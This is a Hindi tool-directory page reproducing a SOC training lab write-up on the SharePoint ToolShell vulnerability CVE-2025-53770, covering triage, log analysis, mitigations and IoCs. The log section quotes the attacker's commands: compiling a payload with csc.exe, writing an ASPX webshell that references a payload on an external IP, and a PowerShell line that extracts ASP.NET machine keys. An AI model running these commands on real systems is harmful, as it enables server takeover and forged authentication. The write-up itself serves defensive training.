Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — विश्लेषण कौशल और रिपोर्टिंग को प्रशिक्षित करने के लिए एक गतिविधि | Kitploit
उपकरण/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफोरेंसिकखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रियालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

विश्लेषण कौशल और रिपोर्टिंग को प्रशिक्षित करने के लिए एक गतिविधि

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

यह Let's Defend प्लेटफ़ॉर्म पर किए गए एक जाँच-पड़ताल पर आधारित है, जो हाल ही में सामने आए SharePoint CVE पर केंद्रित है। आइए एक नज़र डालते हैं।

Immagine 2025-07-27 162109
  1. नियम के नाम की जाँच करें। नियमों के नाम आमतौर पर विशेष रूप से उस हमले के लिए बनाए जाते हैं जिसे पहचाना जाना है। नियम के नाम की जाँच करके, आप समझ सकते हैं कि आप किस हमले का सामना कर रहे हैं।

SOC342 नियम ने संवेदनशील ToolPane.aspx पृष्ठ को लक्षित करने वाले एक अनप्रमाणित (unauthenticated) POST अनुरोध का पता लगाया, जिसमें निम्नलिखित विशेषताएँ शामिल हैं:

एक बड़ा पेलोड (Content-Length: 7699)

एक संदिग्ध referer (SignOut.aspx) जो संभवतः उत्पत्ति को छिपाने के लिए उपयोग किया गया था

ToolShell भेद्यता के शोषण के अनुरूप व्यवहार

  1. पता लगाएँ कि ट्रैफ़िक किन दो उपकरणों के बीच हो रहा है।

एक बाहरी उपयोगकर्ता (IP: 107.191.58.76) ने एक आंतरिक SharePoint सर्वर (172.16.20.17) को एक क्राफ्टेड अनुरोध भेजा।

अपने एंडपॉइंट के लॉग का विश्लेषण करें

2

एक w3wp.exe प्रक्रिया द्वारा एन्कोडेड PowerShell कमांड निष्पादित किया जाना संभावित शोषण या पोस्ट-एक्सप्लॉइटेशन गतिविधि (जैसे, छिपे हुए पेलोड का निष्पादन) का संकेत दे सकता है।

SharePoint वातावरण में, यह सत्यापित करना महत्वपूर्ण है कि यह व्यवहार अपेक्षित है या दुरुपयोग का प्रतिनिधित्व करता है।

कमांड को base64 का उपयोग करके अस्पष्ट (obfuscated) किया गया है

Immagine 2025-07-27 163800

यह पेलोड हमलावर को उस मशीन से महत्वपूर्ण ASP.NET कॉन्फ़िगरेशन कुंजियाँ निकालने और प्रिंट करने की अनुमति देता है जिस पर यह चलता है।

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

सर्वर पर C# स्रोत कोड से एक निष्पादन योग्य (executable) संकलित करता है।

SharePoint पथ में एक वेब बैकडोर (दुर्भावनापूर्ण ASPX फ़ाइल) बनाता है, जिसे देखने पर, एक बाहरी पेलोड को निष्पादित या डाउनलोड करने की अनुमति मिलती है।

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

यह कमांड SharePoint LAYOUTS फ़ोल्डर में spinstall0.aspx नामक एक फ़ाइल बनाता है और उसमें सामग्री लिखता है (यहाँ एक वेबशेल के कोड का प्रतिनिधित्व करने वाला प्लेसहोल्डर है)।

यह spinstall0.apx का हैश है 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

आइए VirusTotal पर एक नज़र डालते हैं।

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

यह कमांड हमलावर को MachineKeySection के एप्लिकेशन कॉन्फ़िगरेशन तक पहुँचने की अनुमति देता है, जो validation key और decryption key जैसी संवेदनशील क्रिप्टोग्राफ़िक कुंजियों को उजागर कर सकता है।

ये कुंजियाँ ASP.NET सुरक्षा के लिए महत्वपूर्ण हैं, जो प्रमाणीकरण कुकीज़ और ViewState जैसी चीज़ों की सुरक्षा करती हैं।

इन कुंजियों को उजागर करने या पुनर्प्राप्त करने से हमलावर प्रमाणीकरण टोकन गढ़ सकते हैं, संरक्षित डेटा को डिक्रिप्ट कर सकते हैं, या वेब एप्लिकेशन के विरुद्ध अन्य हमले कर सकते हैं।

MITRE ATT&CK

mitre

विश्लेषक नोट:

अलर्ट एक SharePoint सर्वर पर देखी गई असामान्य PowerShell गतिविधि के कारण उत्पन्न हुआ था, जिसे बाद में CVE-2025-53770 को लक्षित करने वाले शोषण प्रयास के रूप में निर्धारित किया गया। हमलावर ने शुरू में C# कंपाइलर (csc.exe) का उपयोग करके एक कस्टम C# निष्पादन योग्य (payload.exe) डाला और संकलित किया, फिर वेब-सुलभ SharePoint निर्देशिका के भीतर एक दुर्भावनापूर्ण ASPX वेबशेल (spinstall0.aspx) बनाया। इसके बाद, .NET रिफ्लेक्शन के माध्यम से सर्वर के कॉन्फ़िगरेशन से संवेदनशील क्रिप्टोग्राफ़िक मशीन कुंजियों को पुनर्प्राप्त करने के लिए एक PowerShell कमांड चलाया गया। क्रियाओं का यह क्रम एक बहु-चरणीय हमले का सुझाव देता है जिसे स्थायी नियंत्रण बनाए रखने और संभवतः प्रमाणीकरण टोकन गढ़ने के लिए डिज़ाइन किया गया है। वेबशेल को VirusTotal डिटेक्शन अनुपात 39/62 के साथ दुर्भावनापूर्ण के रूप में सत्यापित किया गया था। घटना की पुष्टि एक true positive के रूप में की गई है, और आगे की रोकथाम और सुधार उपायों की सलाह दी जाती है।

Immagine 2025-07-27 170751

CVE-2025-53770 विवरण

ऑन-प्रिमाइसेस Microsoft SharePoint Server में अविश्वसनीय डेटा का डिसीरियलाइज़ेशन (Deserialization) एक अनधिकृत हमलावर को नेटवर्क पर कोड निष्पादित करने की अनुमति देता है। Microsoft को ज्ञात है कि CVE-2025-53770 के लिए एक शोषण जंगल में मौजूद है। Microsoft इस भेद्यता को दूर करने के लिए एक व्यापक अपडेट तैयार कर रहा है और उसका पूरी तरह से परीक्षण कर रहा है। इस बीच, कृपया सुनिश्चित करें कि इस CVE दस्तावेज़ में दिया गया शमन (mitigation) लागू है ताकि आप शोषण से सुरक्षित रहें।

Immagine 2025-07-27 171020

Microsoft द्वारा सुझाया गया शमन: संभावित हमलों को कम करने के लिए ग्राहकों को चाहिए:

  1. ऑन-प्रिमाइसेस SharePoint Server के समर्थित संस्करणों का उपयोग करें

  2. ऊपर दिए गए नवीनतम सुरक्षा अपडेट लागू करें।

  3. Microsoft Defender for Endpoint सुरक्षा, या समकक्ष खतरा समाधान तैनात करें

  4. सुनिश्चित करें कि Antimalware Scan Interface (AMSI) चालू है और उचित रूप से कॉन्फ़िगर किया गया है, साथ ही Defender Antivirus जैसा उपयुक्त एंटीवायरस समाधान भी हो

  5. SharePoint Server ASP.NET मशीन कुंजियों को रोटेट करें

IoC

Spinstall0.aspx खतरे के अभिनेताओं द्वारा उपयोग किया जाने वाला वेबशेल

अभिनेताओं ने फ़ाइल नाम को विभिन्न तरीकों से भी संशोधित किया है – जैसे spinstall.aspx, spinstall1.aspx, spinstall2.aspx

यह रिपोर्ट Let's Defend प्लेटफ़ॉर्म पर की गई एक गतिविधि पर आधारित है। प्रस्तुत सभी निष्कर्ष और सामग्री केवल शैक्षिक उद्देश्यों के लिए हैं। सभी अधिकार और स्वामित्व Let's Defend के पास हैं।

टूल डाउनलोड करें